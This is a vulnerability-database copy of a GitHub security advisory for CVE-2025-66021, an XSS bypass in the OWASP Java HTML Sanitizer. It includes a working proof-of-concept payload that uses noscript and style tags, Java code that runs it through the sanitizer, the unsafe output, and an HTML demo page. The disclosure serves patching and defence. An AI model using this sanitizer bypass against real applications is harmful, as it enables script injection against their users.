GHSA-G9GQ-3PFX-2GW2

Vulnerability from github – Published: 2025-11-25 22:10 – Updated: 2025-11-27 09:01
VLAI?
Summary
OWASP Java HTML Sanitizer is vulnerable to XSS via noscript tag and improper style tag sanitization
Details

Summary

It is observed that OWASP java html sanitizer is vulnerable to XSS if HtmlPolicyBuilder allows noscript and style tags with allowTextIn inside the style tag. This could lead to XSS if the payload is crafted in such a way that it does not sanitise the CSS and allows tags which is not mentioned in HTML policy.

Details

The OWASP java HTML sanitizer is vulnerable to XSS. This only happens when HtmlPolicyBuilder allows noscript & style tag with allowTextIn inside style tags.

The following condition is very edge case but if users combine a HtmlPolicyBuilder with any other tags except noscript and allow style tag with allowTextIn inside the style tag then In this case sanitizer would be safe from XSS. This happens because how the browser also perceives noscript tags post sanitization.

PoC

  1. Lets create a HtmlPolicyBuilder which allows p, noscript, style html tags and allows .allowTextIn("style").
  2. There are two XSS payloads which very identical and only difference is one has p tag and other has noscript tag. These payload have script tags that could be vulnerable to XSS and should be stripped out after sanitisation.
1. <noscript><style></noscript><script>alert(1)</script>
2. <p><style></p><script>alert(1)</script>
  1. Run the following piece of code which sanitizes the payload. 
public class main {
    private static final String ALLOWED_HTML_TAGS = "p, noscript, style";

    /**
     * Description of vulnerability :
     *  The OWASP Sanitizer sanitize the user inputs w.r.t to defined whitelisted HTML tags.
     *  However, if script tags is not allowed in the HTML element policy yet it can lead to XSS in edge cases.
     */

    public static void main(String[] args) {
        withAllowedTextAndStyleTag();
    }

    /**
     *  Test case : Vulnerable to XSS
     */
    public static void withAllowedTextAndStyleTag() {
        HtmlPolicyBuilder htmlPolicyBuilder = new HtmlPolicyBuilder();
        PolicyFactory policy = htmlPolicyBuilder
                .allowElements(ALLOWED_HTML_TAGS.split("\\s*,\\s*"))
                .allowTextIn("style")
                .toFactory();
        String untrustedHTMLOne = "<noscript><style></noscript><script>alert(1)</script>";
        String untrustedHTMLTwo = "<p><style></p><script>alert(1)</script>";

        System.out.println("PAYLOAD: " + untrustedHTMLOne +"\nSANITIZED OUTPUT: " + policy.sanitize(untrustedHTMLOne));
        System.out.println("PAYLOAD: " + untrustedHTMLTwo +"\nSANITIZED OUTPUT: " + policy.sanitize(untrustedHTMLTwo));
    }
}

Use the latest library version 

        <dependency>
            <groupId>com.googlecode.owasp-java-html-sanitizer</groupId>
            <artifactId>owasp-java-html-sanitizer</artifactId>
            <version>20240325.1</version>
        </dependency>
  1. Output of the POC code should look like this 

PAYLOAD: <noscript><style></noscript><script>alert(1)</script>
SANITIZED OUTPUT: <noscript><style></noscript><script>alert(1)</script></style></noscript>


PAYLOAD: <p><style></p><script>alert(1)</script>
SANITIZED OUTPUT: <p><style></p><script>alert(1)</script></style></p>
  1. Lets understand what happened in sanitization process below 
--------------------------| --> anything after style tag is cosidered as CSS and not sanitized 
PAYLOAD: <noscript><style> {</noscript><script>alert(1)</script>} -> CSS

-----------------------------------| --> after sanitization, payload in script tag remained same and style and noscript tags is closed. 
SANITIZED OUTPUT: <noscript><style>{</noscript><script>alert(1)</script>}</style></noscript>

-------------------| --> anything after style tag is cosidered as CSS and not sanitized 
PAYLOAD: <p><style></p>{<script>alert(1)</script>} -> CSS

--------------------------- | --> after sanitization payload in script tag remained same and style and p tags is closed. 
SANITIZED OUTPUT: <p><style>{</p><script>alert(1)</script>}</style></p>
  1. Lets create a sample html page and copy both sanitized output which should be generated in step 5 

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>POC OF SANITIZER OUTPUT</title>
</head>
<body>

<!--XSS OUTPUT : <noscript><style></noscript><script>alert(1)</script></style></noscript>-->
<noscript><style></noscript><script>alert(1)</script></style></noscript>

<!-- SAFE OUTPUT -->
<p><style></p><script>alert(1)</script></style></p>

</body>
</html>
  1. Open this HTML page in the browser it should pop an alert.

Alt text

  1. Open inspect element to understand what happened. If users look closely a payload combined with p tag and style tag did not cause XSS and browser percived anything after style tag as CSS.

SAFE from XSS

  1. The payload which combined with noscript tag and style tag did caused XSS. The broswer perceived noscript and which wrapped style tag then closed noscript tag and after that script payload is considered as valid HTML tag and it executed in browser and this leads to XSS because this is very different then what happened in the last example with p tag.

XSS POC

Impact

  1. This potentially could leads to XSS in applications. Ref : https://owasp.org/www-community/attacks/xss/
Severity ?
8.6 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.googlecode.owasp-java-html-sanitizer:owasp-java-html-sanitizer"
      },
      "versions": [
        "20240325.1"
      ]
    }
  ],
  "aliases": [
    "CVE-2025-66021"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-11-25T22:10:17Z",
    "nvd_published_at": "2025-11-26T02:15:49Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nIt is observed that OWASP java html sanitizer is vulnerable to XSS if HtmlPolicyBuilder allows `noscript` and `style` tags with `allowTextIn` inside the style tag. This could lead to XSS if the payload is crafted in such a way that it does not sanitise the CSS and allows tags which is not mentioned in HTML policy. \n\n### Details\n\nThe OWASP java HTML sanitizer is vulnerable to XSS. This only happens when HtmlPolicyBuilder allows `noscript` \u0026 `style` tag with `allowTextIn` inside style tags.\n\nThe following condition is very edge case but if users combine a HtmlPolicyBuilder with any other tags except `noscript` and allow `style` tag with `allowTextIn` inside the style tag then In this case sanitizer would be safe from XSS. This happens because how the browser also perceives `noscript` tags post sanitization. \n\n### PoC\n\n1.  Lets create a `HtmlPolicyBuilder` which allows `p, noscript, style` html tags and allows `.allowTextIn(\"style\")`.\n2.  There are two XSS payloads which very identical and only difference is one has p tag and other has noscript tag.\nThese payload have script tags that could be vulnerable to XSS and should be stripped out after sanitisation.\n\n```HTML\n1. \u003cnoscript\u003e\u003cstyle\u003e\u003c/noscript\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\n2. \u003cp\u003e\u003cstyle\u003e\u003c/p\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\n```\n\n3. Run the following piece of code which sanitizes the payload. \n\n```java\npublic class main {\n\tprivate static final String ALLOWED_HTML_TAGS = \"p, noscript, style\";\n\n\t/**\n\t * Description of vulnerability :\n\t *  The OWASP Sanitizer sanitize the user inputs w.r.t to defined whitelisted HTML tags.\n\t *  However, if script tags is not allowed in the HTML element policy yet it can lead to XSS in edge cases.\n\t */\n\n\tpublic static void main(String[] args) {\n\t\twithAllowedTextAndStyleTag();\n\t}\n\n\t/**\n\t *  Test case : Vulnerable to XSS\n\t */\n\tpublic static void withAllowedTextAndStyleTag() {\n\t\tHtmlPolicyBuilder htmlPolicyBuilder = new HtmlPolicyBuilder();\n\t\tPolicyFactory policy = htmlPolicyBuilder\n\t\t\t\t.allowElements(ALLOWED_HTML_TAGS.split(\"\\\\s*,\\\\s*\"))\n\t\t\t\t.allowTextIn(\"style\")\n\t\t\t\t.toFactory();\n\t\tString untrustedHTMLOne = \"\u003cnoscript\u003e\u003cstyle\u003e\u003c/noscript\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\";\n\t\tString untrustedHTMLTwo = \"\u003cp\u003e\u003cstyle\u003e\u003c/p\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\";\n\n\t\tSystem.out.println(\"PAYLOAD: \" + untrustedHTMLOne +\"\\nSANITIZED OUTPUT: \" + policy.sanitize(untrustedHTMLOne));\n\t\tSystem.out.println(\"PAYLOAD: \" + untrustedHTMLTwo +\"\\nSANITIZED OUTPUT: \" + policy.sanitize(untrustedHTMLTwo));\n\t}\n}\n```\n\nUse the latest library version \n\n```xml\n\t\t\u003cdependency\u003e\n\t\t\t\u003cgroupId\u003ecom.googlecode.owasp-java-html-sanitizer\u003c/groupId\u003e\n\t\t\t\u003cartifactId\u003eowasp-java-html-sanitizer\u003c/artifactId\u003e\n\t\t\t\u003cversion\u003e20240325.1\u003c/version\u003e\n\t\t\u003c/dependency\u003e\n```\n\n4. Output of the POC code should look like this \n\n```HTML\n\nPAYLOAD: \u003cnoscript\u003e\u003cstyle\u003e\u003c/noscript\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\nSANITIZED OUTPUT: \u003cnoscript\u003e\u003cstyle\u003e\u003c/noscript\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003c/style\u003e\u003c/noscript\u003e\n\n\nPAYLOAD: \u003cp\u003e\u003cstyle\u003e\u003c/p\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\nSANITIZED OUTPUT: \u003cp\u003e\u003cstyle\u003e\u003c/p\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003c/style\u003e\u003c/p\u003e\n\n```\n\n5. Lets understand what happened in sanitization process below \n\n```txt\n--------------------------| --\u003e anything after style tag is cosidered as CSS and not sanitized \nPAYLOAD: \u003cnoscript\u003e\u003cstyle\u003e {\u003c/noscript\u003e\u003cscript\u003ealert(1)\u003c/script\u003e} -\u003e CSS\n\n-----------------------------------| --\u003e after sanitization, payload in script tag remained same and style and noscript tags is closed. \nSANITIZED OUTPUT: \u003cnoscript\u003e\u003cstyle\u003e{\u003c/noscript\u003e\u003cscript\u003ealert(1)\u003c/script\u003e}\u003c/style\u003e\u003c/noscript\u003e\n\n-------------------| --\u003e anything after style tag is cosidered as CSS and not sanitized \nPAYLOAD: \u003cp\u003e\u003cstyle\u003e\u003c/p\u003e{\u003cscript\u003ealert(1)\u003c/script\u003e} -\u003e CSS\n\n--------------------------- | --\u003e after sanitization payload in script tag remained same and style and p tags is closed. \nSANITIZED OUTPUT: \u003cp\u003e\u003cstyle\u003e{\u003c/p\u003e\u003cscript\u003ealert(1)\u003c/script\u003e}\u003c/style\u003e\u003c/p\u003e\n\n```\n\n6. Lets create a sample html page and copy both sanitized output which should be generated in step 5 \n\n```HTML\n\n\u003c!DOCTYPE html\u003e\n\u003chtml lang=\"en\"\u003e\n\u003chead\u003e\n    \u003cmeta charset=\"UTF-8\"\u003e\n    \u003ctitle\u003ePOC OF SANITIZER OUTPUT\u003c/title\u003e\n\u003c/head\u003e\n\u003cbody\u003e\n\n\u003c!--XSS OUTPUT : \u003cnoscript\u003e\u003cstyle\u003e\u003c/noscript\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003c/style\u003e\u003c/noscript\u003e--\u003e\n\u003cnoscript\u003e\u003cstyle\u003e\u003c/noscript\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003c/style\u003e\u003c/noscript\u003e\n\n\u003c!-- SAFE OUTPUT --\u003e\n\u003cp\u003e\u003cstyle\u003e\u003c/p\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003c/style\u003e\u003c/p\u003e\n\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\n\n\n7. Open this HTML page in the browser it should pop an alert.\n\n![Alt text](https://github.com/user-attachments/assets/0b96a6c2-818e-4a21-80df-42c4cf26bafd \"Leads to XSS\")\n\n8. Open inspect element to understand what happened. If users look closely a payload combined with p tag and style tag did not cause XSS and browser percived anything after style tag as CSS. \n\n![SAFE from XSS](https://github.com/user-attachments/assets/b6c657fc-32df-4006-9ee8-ca6598f094ad \"Safe from XSS\")\n\n9. The payload which combined with noscript tag and style tag did caused XSS.\nThe broswer perceived noscript and which wrapped `style` tag then closed noscript tag and after that script payload is considered as valid HTML tag and it executed in browser and this leads to XSS because this is very different then what happened in the last example with p tag.\n\n![XSS POC](https://github.com/user-attachments/assets/abfe0112-c63e-4149-a343-509b25db1b60 \"Leads to XSS\")\n\n\n### Impact\n1. This potentially could leads to XSS in applications. \nRef : https://owasp.org/www-community/attacks/xss/",
  "id": "GHSA-g9gq-3pfx-2gw2",
  "modified": "2025-11-27T09:01:33Z",
  "published": "2025-11-25T22:10:17Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/OWASP/java-html-sanitizer/security/advisories/GHSA-g9gq-3pfx-2gw2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66021"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/OWASP/java-html-sanitizer"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OWASP Java HTML Sanitizer is vulnerable to XSS via noscript tag and improper style tag sanitization "
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.